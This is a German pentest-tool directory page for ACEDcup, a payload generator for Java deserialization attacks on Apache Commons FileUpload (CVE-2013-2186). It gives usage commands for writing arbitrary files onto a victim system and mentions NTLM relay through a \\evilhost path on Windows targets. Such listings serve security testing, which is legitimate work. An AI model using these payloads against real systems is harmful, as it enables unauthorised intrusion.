Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/grrrdog/acedcup
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubgrrrdog/acedcup

ACEDcup

Payload-Generator für den Java-Binary-Deserialization-Angriff mit Commons FileUpload (CVE-2013-2186)

Repository anzeigen
3714vor 10 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ACEDcup

Das ACEDcup-Tool ist ein Payload-Generator für Java-Binary-Deserialisierungsangriffe (ACED)

Für Apache Commons FileUpload Version <= 1.3 (CVE-2013-2186) und Oracle JDK Version < 7u40

Der Angriff funktioniert auch mit neueren Versionen der Bibliothek oder von Java. Wir können beliebige Inhalte in jedes Verzeichnis hochladen, aber wir können den Dateinamen nicht kontrollieren (so etwas wie upload_f71d3547_72ed_4ae1_90fe_0d319115cd42_00000000.tmp) in dieser Situation. Allerdings kann das in manchen Fällen nützlich sein.

Außerdem können wir einen NTLM-Relay-/Sniffing-Angriff durchführen (mit \\evilhost\any\path), wenn Ihr Ziel ein Windows-Betriebssystem ist.

Verwendung

root@kitploit:~
  1) Zuerst erstellen wir einen serialisierten Payload:
  java -jar aced_cup.jar /path/payload /path/target /path/out 1
  
  /path/payload - ein Pfad zu einer Datei mit Ihrem Payload
  /path/target - ein Pfad zu einer Datei, die auf Ihrem Opfer erstellt wird (diese wird im serialisierten Payload gespeichert)
  /path/out - ein Pfad zu einer Datei mit dem serialisierten Payload
  0 - deaktiviert die Null-Byte-Endung, wenn Sie ein gepatchtes System angreifen (standardmäßig mit Null-Byte)

  2) Dann setzen wir den serialisierten Payload in den ser_reader (wenn wir die Schwachstelle auf Ihrem Host testen wollen):
  java -jar ser_reader serialized_payload.txt
  
  ser_reader versucht, den Payload zu deserialisieren, und aufgrund einer Schwachstelle in seiner Bibliothek erstellt er eine neue Datei im angegebenen Verzeichnis.

Beispiel

java -jar aced_cup.jar D:\\cup_exploit\\payload.txt /home/user/test/any_name.txt D:\\cup_exploit\\serialized_payload.txt

```java -jar ser_reader D:\cup_exploit\serialized_payload.txt````

Tool herunterladen